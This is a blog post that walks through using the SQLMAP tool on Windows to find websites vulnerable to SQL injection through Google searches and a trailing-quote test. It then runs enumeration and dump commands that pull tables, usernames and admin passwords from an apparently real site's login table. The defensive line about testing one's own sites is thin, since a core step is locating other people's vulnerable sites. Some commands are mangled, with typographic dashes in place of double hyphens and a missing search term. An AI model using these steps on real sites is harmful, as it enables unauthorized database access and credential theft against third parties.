Skip to content

SQLMAP – How to hack a Website’s SQL tables on Windows


SQL injection allows us to remotely pull down all the tables, login usernames and admin accounts for a website.  The most powerful tool for SQL injection is SQLMAP, which we can use on Windows and KALI.

Test all your websites with SQLMAP to ensure that they are not vulnerable.  It is simply essential that you test all your websites using this tool.

Step 1 – Download Python for Windows

Step 2 – Download SQLMAP for Windows

Install to C:/SQLMAP


sqlmap download zip


Step 3 – Find a vulnerable website

Use Google.  Search for the term


Browse to the website and then put a single dash at the end of the url.

so it reads php?=id1′

If you get an error the website is vulnerable.  Part of EU data protection could include a test or attack against the SQL databases.


Step 4 – Run SQLMAP Wizard on Windows

Open a cmd prompt.

cd c:\SQLMAP


look for a second sqlmap-project-sqlmap-xxxx directory.

cd sqlmap-project-sqlmap-xxxx

here you’ll see listed…  this is python scrip to be run.

sqlmap start –wizard

sqlmap wizard

Select Target Website – including the id=1

sqlmap select target website

Select Injection Difficulty  (default)

Go for defaults to start off with.

sqlmap select injection difficulty

Select Enumeration level

Full enumeration of the database would be level 3- as shown

sqlmap dbs enumerate 3


SQLMAP will report the OS used first – regardless of what attack code is used.

sqlmap reports on os used

How do we extract all databases? –dbs

Look for how many databases there are, and how many tables!!



How do we extract Tables? –D www – tables

Did you see all the TABLES on the website list out?

Look for likely targets… eg Login, username or password table.

Here we find 11 tables.

sqlmap reports 11 tables on 2 databases


Now that we can read the tables, we can start to dump the data out.


How do we get usernames? –D www -T uk_cms_gb_login -C username –dump

Look for “admin”


How to get all the Login details? –D www -T uk_cms_gb_login –columnssqlmap login columns

This should display columns with items such as Cookie, ID, IP, Password, Username.



Step 6 – Get Passwords (of Admin) –D www -T uk_cms_gb_login -C password –dump

sqlmap dump password


SQLMAP should be used against all your websites.

The last thing you want is someone to steal your entire database.


Further SQL queries



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: